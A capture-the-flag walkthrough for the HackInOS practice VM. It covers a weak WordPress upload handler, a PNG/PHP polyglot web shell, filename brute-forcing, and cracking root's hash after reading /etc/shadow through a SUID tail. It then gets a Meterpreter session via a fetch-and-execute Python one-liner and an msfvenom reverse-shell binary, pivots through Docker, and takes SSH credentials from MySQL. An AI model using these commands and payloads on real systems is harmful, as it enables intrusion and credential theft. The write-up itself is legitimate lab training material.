Environment setup
Download HackInOS

Import the .ovf into VirtualBox. Note: the appliance is meant to be imported with VirtualBox.
Host discovery
Attacker (Kali) IP:
    192.168.222.131
Finding the target IP:
    arp-scan --interface=eth0 192.168.222.0/24
Target IP (from the arp-scan output):
    192.168.222.132 00:0c:29:9e:3a:be VMware, Inc.
Later sessions of this writeup show the Kali box as 192.168.222.134; the attacker address changed between sessions, while the target stays at 192.168.222.132.
Port scanning
    nmap -sVC -p- 192.168.222.132
-sV: service/version detection (-A would enable OS detection, version detection, default scripts and traceroute at once)
-sC: run the default NSE scripts against the service identified on each port
-p-: scan all 65535 TCP ports
Only ports 22 and 8000 are open:
    22/tcp   open  ssh   OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    8000/tcp open  http  Apache httpd 2.4.25 ((Debian))
Note the banners: the SSH service identifies itself as Ubuntu while the web server on 8000 reports Debian, an early hint that port 8000 is served from a different system than the one answering on 22 (it turns out to be a Docker container).
Trying SSH
    ➜ ~ ssh root@192.168.222.132
    The authenticity of host '192.168.222.132 (192.168.222.132)' can't be established.
    ECDSA key fingerprint is SHA256:TW0nX/yND0yHIOROC6P/fnW1FZBF8bZkZUA258XTvD0.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '192.168.222.132' (ECDSA) to the list of known hosts.
    root@192.168.222.132's password:
    Permission denied, please try again.
    root@192.168.222.132's password:
The server accepts password authentication, but we do not know the password. Note that "Permission denied, please try again" does not prove that the root account exists or that root login is permitted: OpenSSH returns the same message for non-existent users and for accounts blocked by PermitRootLogin. Park this for now and start with port 8000.
Breaking in through port 8000
It looks like a web interface
Port 8000 is probably HTTP, so open it in a browser (screenshot not reproduced here).
It is a WordPress site. A first look at the static pages shows nothing interesting, so the next step is a wpscan run.
Httrack
httrack mirrors every reachable page of the target site to local disk, which is convenient for offline review:
    httrack -u http://192.168.222.132:8000/
It only retrieved index.html, so there is little to learn here.
Wpscan
WPScan is a black-box scanner dedicated to WordPress vulnerabilities.
Enumeration
    wpscan --url http://192.168.222.132:8000/ -e
-e / --enumerate: enumerate plugins, themes, users and other components
Results
    http://192.168.222.132:8000/robots.txt
    WordPress version 5.0.3 identified (Insecure, released on 2019-01-09).
     | Detected By: Emoji Settings (Passive Detection)
     |  - http://192.168.222.132:8000/, Match: 'wp-includes/js/wp-emoji-release.min.js?ver=5.0.3'
     | Confirmed By: Meta Generator (Passive Detection)
     |  - http://192.168.222.132:8000/, Match: 'WordPress 5.0.3'
     |
     | [!] 1 vulnerability identified:
     |
     | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
     |     Fixed in: 5.0.4
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9230
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
     |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
     |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
     |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
The only finding against WordPress core is CVE-2019-9787, a comment XSS that needs an administrator to be lured into a CSRF, so it is not a useful foothold here; robots.txt is the more interesting lead.
robots.txt exists; fetching it gives:
    User-agent: *
    Disallow: /upload.php
    Disallow: /uploads
Nikto
Nikto is a small web server vulnerability scanner.
    nikto -h 192.168.222.132 -p 8000 -o /root/hackINOS.html
Results
    "robots.txt" contains 2 entries which should be manually viewed.
Nikto finds less than wpscan did; for a WordPress target, wpscan is clearly the better first choice.
Visiting upload.php
The hint is hard to miss: https://github.com/fatihhcelik/Vulnerable-Machine---Hint
That repository contains the source of the upload script, and with the source in hand the rest is easy. The file is reproduced below (the page had it on one run-on line; it is reformatted with the opening <?php tag and comments added, but the logic is the original, deliberately weak, upload handler):
    <div align="center">
    <form action="" method="post" enctype="multipart/form-data">
    <br>
    <b>Select image : </b>
    <input type="file" name="file" id="file" style="border: solid;">
    <input type="submit" value="Submit" name="submit">
    </form>
    </div>
    <?php
    // Check if image file is a actual image or fake image
    if(isset($_POST["submit"])) {
        $rand_number = rand(1,100);
        $target_dir = "uploads/";
        // stored name: md5(<original basename><random number 1..100>)
        $target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
        $file_name = $target_dir . basename($_FILES["file"]["name"]);
        $uploadOk = 1;
        // extension comes from the client-supplied name and is never validated
        $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION));
        $type = $_FILES["file"]["type"];   // assigned but never checked
        // getimagesize() parses the file's own header bytes, not the Content-Type header
        $check = getimagesize($_FILES["file"]["tmp_name"]);
        if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){
            $uploadOk = 1;
        }else{
            $uploadOk = 0;
            echo ":)";
        }
        if($uploadOk == 1){
            // the unvalidated extension is appended to the hashed name
            move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);
            echo "File uploaded /uploads/?";
        }
    }
    ?>
Source audit
- Uploaded files are stored under /uploads, and the stored name is the MD5 of the original file name concatenated with a random integer between 1 and 100:
      $target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
- After hashing, the file's original extension is appended unchanged:
      move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);
  So a file uploaded as x.php is stored as uploads/<md5>.php and will be executed by Apache.
- The only content check is getimagesize(): the upload is accepted if its header parses as a PNG or GIF. The Content-Type header ($type) is read but never compared against anything, so changing it in the request achieves nothing; what is needed is a file whose first bytes form a valid PNG or GIF header, followed by the PHP payload.
- Because the random number has only 100 possible values, the stored name has only 100 candidates, all computable offline from the original file name.
- A successful upload prints
      "File uploaded /uploads/?"
Exploiting the file upload
Uploading a web shell
Finding the upload path:
Submit the form with no file selected and look at the response:
    <b>Warning</b>: getimagesize(): Filename cannot be empty in <b>/var/www/html/upload.p
The leaked path shows that the uploads directory lives under /var/www/html/. Keep this in mind; it is needed later.
Building the shell:
The "MIME" check in upload.php is not based on the request's Content-Type but on getimagesize(), which reads the uploaded file's own header, so the shell must begin with the bytes of a real PNG image. Concatenating a small PNG with the PHP file produces a polyglot that getimagesize() accepts and that PHP still executes, since PHP passes through everything outside the <?php ... ?> tags as output:
    cat 1.png 1.php > 2.php
Brute-forcing the shell's name
The stored name is md5("<original name>" + rand(1,100)) + ".php", so all candidates can be generated in advance. (PHP's rand(1,100) is inclusive; the original loop used range(100), which misses 100 and includes 0, so the loops below run 1..100.)
    import hashlib

    # candidate names for a file uploaded as "b374.php"
    with open("path.txt", "a") as f:
        for i in range(1, 101):
            filename = "b374.php" + str(i)
            path = hashlib.md5(filename.encode()).hexdigest() + ".php"
            f.write(path + "\n")
The list was meant to be fed to gobuster, but gobuster had just been upgraded to 3.0 and failed with an unexplained error, so the check is done in Python as well:
    import hashlib
    import requests

    # probe each candidate name with a HEAD request; stop at the first hit
    for i in range(1, 101):
        filename = "2.php" + str(i)
        path = hashlib.md5(filename.encode()).hexdigest() + ".php"
        url = "http://192.168.222.132:8000/uploads/" + path
        if requests.head(url).status_code == 200:
            print("Success: " + url)
            break
Result
    http://192.168.222.132:8000/uploads/d3ec45de3befea4f9ada1b01ddcbe0be.php : 200
The uploaded shell stops working after a short while, apparently under ten seconds: the server evidently runs a scheduled job that removes files from the uploads directory.
That is not enough time to drive a full-featured web shell and trigger a reverse shell from it, so the approach changes: connect with weevely, the Caidao (China Chopper) style shell client bundled with Kali.
weevely
weevely is Kali's equivalent of Caidao, but it only supports PHP agents.
Generate a small agent:
    ➜ script weevely generate shell ./2.php
    Generated './2.php' with password 'shell' of 772 byte size.
    ➜ script cat 1.png 2.php > 3.php
Upload 3.php through Burp Suite and brute-force the stored name again with the script above (every upload draws a fresh random number, so the name changes each time):
    http://192.168.222.132:8000/uploads/ba266cb299323ddc54648f2976bc5240.php
Connect with weevely (the hash here differs from the one above, presumably because the file had to be re-uploaded after the cleanup job removed it):
    weevely http://192.168.222.132:8000/uploads/937ce472973cfefec3886c94e750060b.php shell
Use weevely to drop the larger web shell into the web root, /var/www/html, outside the uploads directory that gets cleaned:
    www-data@1afdd1f6b82c:/var/www/html/uploads $ file_upload /mnt/hgfs/ctf_debug/script/1.php /var/www/html/1.php
    True
Open the big shell in the browser:
Reverse shell
Start a listener on Kali:
    nc -lvp 4444
Use the big shell's Reverse Shell function to connect back to it.
Upgrade to a proper TTY:
    python -c "import pty; pty.spawn('/bin/bash')"
Detecting the Docker environment
Check the cgroup of PID 1
    cat /proc/1/cgroup
If the output contains strings such as "docker", the process is probably running inside a Docker container:
    6:devices:/docker/1afdd1f6b82caf7210e675e85deb6a537a2f7839d9fabecd5d57f0e385e6dd3d
Check for /.dockerenv
    ls -alt /.dockerenv
If the file exists, this is a Docker container:
    www-data@1afdd1f6b82c:/var/www/html$ ls -alt /.dockerenv
    -rwxr-xr-x 1 root root 0 Feb 23 15:12 /.dockerenv
Check /proc/1/sched
    cat /proc/1/sched | head -n 1
Inside the container:
    www-data@1afdd1f6b82c:/var/www/html$ cat /proc/1/sched | head -n 1
    apache2 (1, #threads: 1)
On a real host it looks like this:
    root@kali:~# cat /proc/1/sched | head -n 1
    systemd (1, #threads: 1)
Judging by the first process
On a normal system the first process Linux starts is init or systemd; inside a Docker container PID 1 is whatever the image's entrypoint is.
Real host:
    root@kali:~# ps -q 1
      PID TTY          TIME CMD
        1 ?        00:00:02 systemd
Docker container:
    root@55ff7ae5bdae:~# ps -p 1
      PID TTY          TIME CMD
        1 ?        00:00:00 startWebLogic.s
Taken together these checks show that the Apache server is running in a Docker container: PID 1 is apache2, /.dockerenv exists, and the container ID in the cgroup path begins with the hostname 1afdd1f6b82c.
The flag usually lives on the real host, so we need to get out of the container.
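The following is an added example, not from the original writeup: the container checks above expressed as functions over the text they inspect, so the decision logic can be tested against captured output such as the lines shown on this page, plus a run_live() that applies them to the local /proc. The token list for cgroup paths and the choice of init/systemd as "host" PID 1 names are assumptions; on cgroup v2 hosts /proc/1/cgroup inside a container may read just 0::/, so a negative cgroup result is not conclusive on its own.

```python
"""Added example (not from the original writeup): the container checks as pure
functions over the text they inspect, so the decision logic can be tested
against captured output. run_live() applies them to the local /proc."""
import os
import re

# tokens seen in /proc/1/cgroup under common container runtimes (assumption)
CONTAINER_CGROUP_TOKENS = re.compile(r"(docker|containerd|lxc|kubepods|podman|libpod)")
HOST_INIT_NAMES = {"init", "systemd"}


def cgroup_hints_container(cgroup_text: str) -> bool:
    """True if any cgroup line carries a container-runtime token.
    Caveat: on cgroup v2 a container may show only '0::/', so False is not proof of a host."""
    return any(CONTAINER_CGROUP_TOKENS.search(line) for line in cgroup_text.splitlines())


def pid1_name_from_sched(sched_first_line: str) -> str:
    """'apache2 (1, #threads: 1)' -> 'apache2'."""
    return sched_first_line.split(" (", 1)[0].strip()


def pid1_is_host_init(pid1_name: str) -> bool:
    return pid1_name in HOST_INIT_NAMES


def container_id_from_cgroup(cgroup_text: str):
    """The 64-hex container ID embedded in a docker cgroup path, if present;
    its first 12 characters are Docker's default container hostname."""
    m = re.search(r"/docker/([0-9a-f]{64})", cgroup_text)
    return m.group(1) if m else None


def assess(cgroup_text: str, sched_first_line: str, dockerenv_exists: bool) -> dict:
    """Combine the indicators the writeup uses into one verdict."""
    pid1 = pid1_name_from_sched(sched_first_line)
    indicators = {
        "dockerenv": dockerenv_exists,
        "cgroup": cgroup_hints_container(cgroup_text),
        "pid1_not_init": not pid1_is_host_init(pid1),
    }
    return {
        "pid1": pid1,
        "container_id": container_id_from_cgroup(cgroup_text),
        "indicators": indicators,
        "likely_container": any(indicators.values()),
    }


def run_live() -> dict:
    """Apply the checks to the machine this runs on (Linux only)."""
    with open("/proc/1/cgroup") as fh:
        cgroup = fh.read()
    with open("/proc/1/sched") as fh:
        sched = fh.readline()
    return assess(cgroup, sched, os.path.exists("/.dockerenv"))


if __name__ == "__main__":
    print(run_live())
```

Any single indicator firing is treated as "likely container"; a non-init PID 1 alone is the weakest of the three, which is why the writeup cross-checks all of them.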
Privilege escalation inside Docker
Enumeration script
This time LinEnum.sh is used to look for escalation paths.
The big shell is used to upload LinEnum.sh to the target; other ways to get files across would be:
    - start a temporary HTTP server on Kali and wget the file from the target
    - the big shell's one-click upload
    - scp
    ./LinEnum.sh -r report -e /tmp/ -t
Pack up the report for review:
    tar cvf report.tar LinEnum-export-18-07-19
From the report, the list of SUID files stands out:
tail is SUID root, which means it can read any file, including the root password hash in /etc/shadow.
Reading the root hash
(tail -c1G prints the last gigabyte of the file, i.e. all of it.)
    www-data@1afdd1f6b82c:/$ tail -c1G /etc/shadow
    root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
The hash prefix identifies the algorithm: $6$ is SHA-512 crypt, $5$ SHA-256 crypt, $2$ Blowfish (bcrypt), $1$ MD5 crypt. The fields of the line are:
    account name: root
    password hash: $6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/ (salt qoj6/JJi)
    last password change: 17951 (days since 1970-01-01)
    minimum days between changes: 0
    maximum password age: 99999 (effectively never expires)
    warning period before expiry: 7 days
    inactivity period after expiry: empty
    account expiry date: empty
    reserved field: empty
Cracking with john
Write the line out for john, crack it (a wordlist such as rockyou is enough here), then display the result. Single quotes matter: in double quotes the shell would expand $6, $qoj6 and $FQe as variables, and the original command had also dropped the $6$ prefix, which john needs to pick the format.
    echo 'root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/' > hash
    john --wordlist=/usr/share/wordlists/rockyou.txt hash
    john --show hash
Password: john
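The following is an added example, not from the original writeup: a parser for the /etc/shadow line format discussed above. It splits a line into its nine fields, identifies the crypt scheme from the $id$ prefix, converts the day counts into dates and emits the user:hash line john expects. The sample line is the one the writeup recovered with the SUID tail; the prefix table is a fixed list of the common schemes and is an assumption about what the target's libc supports.

```python
"""Added example (not from the original writeup): parse a /etc/shadow line,
identify the crypt algorithm from the hash prefix and emit the user:hash
line john expects."""
from datetime import date, timedelta

CRYPT_PREFIXES = {
    "$1$": "MD5 crypt",
    "$2$": "Blowfish (bcrypt)", "$2a$": "Blowfish (bcrypt)",
    "$2b$": "Blowfish (bcrypt)", "$2y$": "Blowfish (bcrypt)",
    "$5$": "SHA-256 crypt",
    "$6$": "SHA-512 crypt",
    "$y$": "yescrypt",
}
FIELDS = ("name", "hash", "lastchg", "min", "max", "warn", "inactive", "expire", "reserved")

# the line the writeup read through the SUID tail
SAMPLE_SHADOW_LINE = ("root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/"
                      ":17951:0:99999:7:::")


def identify_algorithm(hash_field: str) -> str:
    """Map the $id$ prefix to a name; locked/empty fields are reported as such."""
    if hash_field in ("", "*") or hash_field.startswith("!"):
        return "no usable password (locked or empty)"
    for prefix, name in CRYPT_PREFIXES.items():
        if hash_field.startswith(prefix):
            return name
    return "unknown or legacy DES"  # 13-character DES hashes carry no prefix


def days_to_iso(days_field: str):
    """shadow stores dates as days since the Unix epoch; '' means unset."""
    if not days_field:
        return None
    return (date(1970, 1, 1) + timedelta(days=int(days_field))).isoformat()


def parse_shadow_line(line: str) -> dict:
    parts = line.rstrip("\n").split(":")
    if len(parts) != 9:
        raise ValueError("expected 9 colon-separated fields, got %d" % len(parts))
    rec = dict(zip(FIELDS, parts))
    rec["algorithm"] = identify_algorithm(rec["hash"])
    # for the $N$salt$hash schemes the salt sits between the 2nd and 3rd '$'
    rec["salt"] = rec["hash"].split("$")[2] if rec["hash"].count("$") >= 3 else None
    rec["lastchg_date"] = days_to_iso(rec["lastchg"])
    rec["expire_date"] = days_to_iso(rec["expire"])
    rec["never_expires"] = rec["max"] == "99999"
    return rec


def john_line(rec: dict) -> str:
    """'user:hash' is enough for john to detect the format from the prefix."""
    return "%s:%s" % (rec["name"], rec["hash"])


if __name__ == "__main__":
    rec = parse_shadow_line(SAMPLE_SHADOW_LINE)
    for key in ("name", "algorithm", "salt", "lastchg_date", "never_expires"):
        print("%-14s %s" % (key, rec[key]))
    print(john_line(rec))
```

The last-change date it computes for the sample line falls one day after the /.dockerenv timestamp seen earlier, which is consistent with the image having been built around then.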
Root obtained
The next steps use this container as a pivot into the internal network:
Pivoting with Meterpreter
Find the internal subnet
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.18.0.3  netmask 255.255.0.0  broadcast 172.18.255.255
            ether 02:42:ac:12:00:03  txqueuelen 0  (Ethernet)
            RX packets 9279  bytes 792244 (773.6 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 8578  bytes 6367756 (6.0 MiB)
            TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
The internal network is 172.18.0.0/16, a Docker bridge: the 02:42 MAC prefix followed by the hex-encoded IP (ac:12:00:03 = 172.18.0.3) is Docker's default addressing.
Ping test
    ➜ ~ ping 172.18.0.3
    PING 172.18.0.3 (172.18.0.3) 56(84) bytes of data.
    64 bytes from 172.18.0.3: icmp_seq=1 ttl=128 time=8.51 ms
Kali appears to reach the container directly, so try nmap:
    ➜ ~ nmap -PO 172.18.0.0/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-19 09:05 CST
    Nmap scan report for 172.18.0.1
    Host is up (0.041s latency).
    PORT    STATE SERVICE
    1/tcp   open  tcpmux
    3/tcp   open  compressnet
    4/tcp   open  unknown
    6/tcp   open  unknown
    7/tcp   open  echo
    9/tcp   open  discard
    ...
These results cannot be trusted: the ping reply carries TTL 128, which a Linux container would not produce, and "every port open" is the classic signature of an intermediate device (most likely the VM network's NAT) answering on behalf of an address it cannot actually reach. Since nmap from Kali yields nothing useful, the next step is a Meterpreter session on the container to use as a pivot.
Callback script 1
    use exploit/multi/script/web_delivery
    set lport 8888
    set lhost 192.168.222.134
    run
    [*] Started reverse TCP handler on 192.168.222.134:8888
    [*] Using URL: http://0.0.0.0:8080/i44JcN4PegCve
    [*] Local IP: http://192.168.222.134:8080/i44JcN4PegCve
    [*] Server started.
    [*] Run the following command on the target machine:
    python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.222.134:8080/Xyy19c');exec(r.read());"
(The URL path in the one-liner differs from the one printed above, presumably because the two outputs were captured from separate runs; each run generates a fresh random path.)
Callback
Paste the one-liner into the TTY shell on the target and the session calls back:
    msf5 exploit(multi/script/web_delivery) > [*] 192.168.222.132  web_delivery - Delivering Payload
    [*] Sending stage (53755 bytes) to 192.168.222.132
    [*] Meterpreter session 1 opened (192.168.222.134:8888 -> 192.168.222.132:37218) at 2019-07-19 09:14:10 +0800
Sessions
    msf5 exploit(multi/script/web_delivery) > sessions
    Active sessions
    ===============
      Id  Name  Type                      Information          Connection
      --  ----  ----                      -----------          ----------
      1         meterpreter python/linux  root @ 1afdd1f6b82c  192.168.222.134:8888 -> 192.168.222.132:37820 (172.18.0.3)
Note the Connection column: the session arrives from 192.168.222.132, the host's address, because the container's outbound traffic is NATed by the Docker host, while the session's own view of its address is 172.18.0.3.
Port scan 1
    msf5 exploit(multi/script/web_delivery) > use auxiliary/scanner/portscan/tcp
    msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.1-254
    rhosts => 172.18.0.1-254
    msf5 auxiliary(scanner/portscan/tcp) > set threads 50
    threads => 50
    msf5 auxiliary(scanner/portscan/tcp) > run
Without a route through the session this scan leaves Kali's own interface and cannot reach 172.18.0.0/16. (The option name is threads; the original transcript typed thread.)
Add a route
    msf5 exploit(multi/script/web_delivery) > use post/multi/manage/autoroute
    msf5 post(multi/manage/autoroute) > set session 3
    session => 3
    msf5 post(multi/manage/autoroute) > run
    [!] SESSION may not be compatible with this module.
    [*] Running module against 1afdd1f6b82c
    [*] Searching for subnets to autoroute.
    [*] Unable to get routes from session, trying interface list.
    [+] Route added to subnet 172.18.0.0/255.255.0.0 from eth0.
    [*] Post module execution completed
Port scan 2
    msf5 post(multi/manage/autoroute) > use auxiliary/scanner/portscan/tcp
    msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.1-254
    rhosts => 172.18.0.1-254
    msf5 auxiliary(scanner/portscan/tcp) > set threads 50
    threads => 50
    msf5 auxiliary(scanner/portscan/tcp) > run
The warning says the Python Meterpreter is not among the session types autoroute is written for. Rather than debug pivoting through it, the writeup swaps in a native x64 Linux Meterpreter.
Callback script 2
    ➜ ~ msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.222.134 lport=8855 -f elf -o test
    [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 129 bytes
    Final size of elf file: 249 bytes
    Saved as: test
Listener on Kali (start it before running the payload):
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
    payload => linux/x64/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.222.134
    lhost => 192.168.222.134
    msf5 exploit(multi/handler) > set lport 8855
    lport => 8855
    msf5 exploit(multi/handler) > run
    [*] Started reverse TCP handler on 192.168.222.134:8855
Callback
Run test on the target (as root, from the earlier escalation):
    root@1afdd1f6b82c:~# chmod +x test
    root@1afdd1f6b82c:~# ./test
On Kali:
    [*] Sending stage (3021284 bytes) to 192.168.222.132
    [*] Meterpreter session 1 opened (192.168.222.134:8855 -> 192.168.222.132:57122) at 2019-07-20 08:57:33 +0800
    meterpreter > background
    [*] Backgrounding session 1...
    msf5 exploit(multi/handler) > sessions
    Active sessions
    ===============
      Id  Name  Type                   Information                              Connection
      --  ----  ----                   -----------                              ----------
      1         meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ 172.18.0.3  192.168.222.134:8855 -> 192.168.222.132:57122 (172.18.0.3)
Add the route on Kali:
    msf5 exploit(multi/handler) > sessions 1
    [*] Starting interaction with 1...
    meterpreter > run autoroute -s 172.18.0.0/24
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    [*] Adding a route to 172.18.0.0/255.255.255.0...
    [+] Added route to 172.18.0.0/255.255.255.0 via 192.168.222.132
    [*] Use the -p option to list all active routes
    meterpreter > run autoroute -p
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    Active Routing Table
    ====================
       Subnet             Netmask            Gateway
       ------             -------            -------
       172.18.0.0         255.255.255.0      Session 1
Scan test:
    meterpreter > run post/linux/gather/arp_scanner RHOSTS=172.18.0.0/24
No results.
SOCKS proxy on Kali, so that local tools can be pointed at the pivot:
    meterpreter > background
    msf5 exploit(multi/handler) > use auxiliary/server/socks4a
    msf5 auxiliary(server/socks4a) > set srvhost 192.168.222.134
    srvhost => 192.168.222.134
    msf5 auxiliary(server/socks4a) > run
    msf5 auxiliary(server/socks4a) > netstat -antp | grep 1080
    [*] exec: netstat -antp | grep 1080
    tcp        0      0 192.168.222.134:1080    0.0.0.0:*               LISTEN      61468/ruby
Configure proxychains
Add to /etc/proxychains.conf:
    socks4 192.168.222.134 1080
Nmap through the proxy
    ➜ ~ proxychains nmap -sVC -p- 172.18.0.3
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 09:14 CST
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
This fails. A SOCKS proxy only carries TCP connections, so nmap must be told to use full connect scans and skip host discovery (-sT -Pn); SYN scans and ICMP probes never enter the proxy, and a full -p- range over SOCKS is painfully slow in any case. Metasploit's own scanner over the Meterpreter route is the easier path:
Scanning over the Meterpreter route
    meterpreter > run autoroute -s 172.18.0.0/24
    meterpreter > run autoroute -p
    meterpreter > background
    [*] Backgrounding session 1...
    msf5 auxiliary(server/socks4a) > use post/multi/manage/autoroute
    msf5 post(multi/manage/autoroute) > set session 1
    msf5 post(multi/manage/autoroute) > run
    msf5 post(multi/manage/autoroute) > use auxiliary/scanner/portscan/tcp
    msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.1-254
    msf5 auxiliary(scanner/portscan/tcp) > set threads 6
    msf5 auxiliary(scanner/portscan/tcp) > run
    [+] 172.18.0.1: - 172.18.0.1:22 - TCP OPEN
    [+] 172.18.0.3: - 172.18.0.3:80 - TCP OPEN
    [+] 172.18.0.4: - 172.18.0.4:2021 - TCP OPEN
    [+] 172.18.0.2: - 172.18.0.2:3306 - TCP OPEN
    [+] 172.18.0.1: - 172.18.0.1:8000 - TCP OPEN
Reading the results: 172.18.0.1 is the Docker host (its 22 and 8000 are the services seen from outside, 8000 being the published port of this container's 80), 172.18.0.3 is the container we are in, 172.18.0.2 runs MySQL, and 172.18.0.4 has something listening on 2021.
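The following is an added example, not from the original writeup: a dependency-free TCP connect sweep written to run on the foothold itself. The container already has a Python interpreter (the web_delivery stage relied on it), so the internal bridge can be mapped from inside without routing packets through Meterpreter or a SOCKS proxy at all. The default port list combines the ports the scan above found with a few common internal services (an assumption), and the connect function is injectable so the logic can be exercised without a network.

```python
"""Added example (not from the original writeup): a dependency-free TCP
connect sweep meant to run on the foothold itself, so the internal network
can be mapped without routing traffic through Meterpreter or a SOCKS proxy."""
import socket
from concurrent.futures import ThreadPoolExecutor
from ipaddress import ip_address, ip_network

# ports found above plus the usual internal-service suspects (assumption)
DEFAULT_PORTS = (21, 22, 80, 443, 2021, 3306, 5432, 6379, 8000, 8080)


def tcp_open(host: str, port: int, timeout: float = 0.5,
             connect=socket.create_connection) -> bool:
    """One connect() attempt; any OSError (refused, timeout, unreachable)
    counts as closed. `connect` mirrors socket.create_connection's signature."""
    try:
        sock = connect((host, port), timeout)
    except OSError:
        return False
    try:
        sock.close()
    except OSError:
        pass
    return True


def sweep(cidr: str, ports=DEFAULT_PORTS, timeout: float = 0.5, workers: int = 64,
          connect=socket.create_connection) -> dict:
    """Map {host: [open ports]} for every address in cidr; hosts with nothing
    open are omitted. Output is sorted by address so runs are comparable."""
    targets = [(str(h), p) for h in ip_network(cidr).hosts() for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        flags = list(pool.map(lambda t: tcp_open(t[0], t[1], timeout, connect), targets))
    found = {}
    for (host, port), is_open in zip(targets, flags):
        if is_open:
            found.setdefault(host, []).append(port)
    return {h: sorted(ps) for h, ps in sorted(found.items(), key=lambda kv: ip_address(kv[0]))}


def format_report(found: dict) -> str:
    """One line per host, in the spirit of Metasploit's portscan output."""
    return "\n".join("[+] %s: %s" % (h, ", ".join(str(p) for p in ps)) for h, ps in found.items())


if __name__ == "__main__":
    import sys
    print(format_report(sweep(sys.argv[1] if len(sys.argv) > 1 else "172.18.0.0/24")))
```

Copy it to the container the same way LinEnum.sh was delivered and run it with the bridge's /24 (or the full /16 if time allows); since connections originate from 172.18.0.3 they are subject to none of the routing or proxy limitations discussed above.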
Lateral movement
Connecting to the database server
The database credentials are in /var/www/html/wp-config.php on the web container (user wordpress, password wordpress):
    root@1afdd1f6b82c:/var/www/html# mysql -h 172.18.0.2 -u wordpress -p
    Enter password: wordpress
Pulling the credential table
    MySQL [(none)]> use wordpress;
    MySQL [wordpress]> show tables;
    +-----------------------+
    | Tables_in_wordpress   |
    +-----------------------+
    | host_ssh_cred         |
    ...                     (the other tables are not shown in the original)
    +-----------------------+
    13 rows in set (0.01 sec)
    MySQL [wordpress]> select * from host_ssh_cred;
    +-------------------+----------------------------------+
    | id                | pw                               |
    +-------------------+----------------------------------+
    | hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e |
    +-------------------+----------------------------------+
    1 row in set (0.00 sec)
The pw value e10adc3949ba59abbe56e057f20f883e is an unsalted MD5 (32 hex characters); any online lookup, or hashcat -m 0 with a wordlist, resolves it to 123456.
SSH
The credentials are for the Docker host itself (port 22 on 192.168.222.132 is the host's sshd, the one that reported Ubuntu in the first scan):
    ssh hummingbirdscyber@192.168.222.132
    hummingbirdscyber@vulnvm:~/Desktop$ id
    uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
This is an unprivileged user, but note the group list: membership in docker (gid 129) is by itself a root-equivalent privilege on a Docker host, since any member can start a container that mounts the host's filesystem. The writeup follows the intended clue instead.
There is an a.out on the desktop, probably the intended clue; copy it out with scp for analysis.
SCP
    hummingbirdscyber@vulnvm:~/Desktop$ scp a.out root@192.168.222.134:/tmp
    The authenticity of host '192.168.222.134 (192.168.222.134)' can't be established.
    ECDSA key fingerprint is SHA256:uyiEFaYb+e/fuFbsWaZI4vD0E+Cj6t8iAucXz4MPzxA.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '192.168.222.134' (ECDSA) to the list of known hosts.
    root@192.168.222.134's password:
    a.out
Reversing a.out
Decompiled main():
    int __cdecl main(int argc, const char **argv, const char **envp)
    {
      setgid(0);
      setuid(0);
      system("whoami");
      return 0;
    }
